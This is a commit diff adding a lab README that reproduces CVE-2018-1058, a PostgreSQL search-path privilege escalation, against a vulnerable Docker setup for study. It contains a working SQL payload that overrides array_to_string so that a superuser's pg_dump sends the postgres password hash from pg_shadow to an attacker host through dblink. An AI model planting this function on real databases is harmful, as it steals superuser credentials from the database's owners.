first commit

postgres/CVE-2018-1058/README.md

@@ -0,0 +1,53 @@
+# PostgreSQL Privilege Escalation (CVE-2018-1058)
+
+[中文文档](README.zh-cn.md)
+
+PostgreSQL is a powerful open-source relational database system. A logical error exists in versions 9.3 through 10, where superusers can unknowingly execute malicious code created by regular users, leading to unexpected operations.
+
+References:
+
+- https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058:_Protect_Your_Search_Path
+- https://xianzhi.aliyun.com/forum/topic/2109
+
+## Environment Setup
+
+Execute the following command to start a vulnerable PostgreSQL server:
+
+```
+docker compose up -d
+```
+
+The server will start and listen on the default PostgreSQL port 5432.
+
+## Vulnerability Reproduction
+
+Following the second exploitation method from the references, we'll first connect to PostgreSQL as the regular user `vulhub:vulhub`:
+
+```bash
+psql --host your-ip --username vulhub
+```
+
+![](1.png)
+
+Execute the following SQL statements and then exit:
+
+```sql
+CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
+    select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
+    SELECT pg_catalog.array_to_string($1,$2);
+$$ LANGUAGE SQL VOLATILE;
+```
+
+Now, set up a listener on port 5433 at `10.0.0.1` to wait for the superuser to trigger our "backdoor".
+
+(Simulating superuser actions) On the target machine, execute the `pg_dump` command as the superuser:
+
+```bash
+docker compose exec postgres pg_dump -U postgres -f evil.bak vulhub
+```
+
+This command will export the contents of the `vulhub` database. When executed, our "backdoor" is triggered, and sensitive information is received on the `10.0.0.1` machine:
+
+![](2.png)
+
+This is just one of several exploitation methods for this vulnerability. For more exploitation techniques, please refer to the articles in the References section.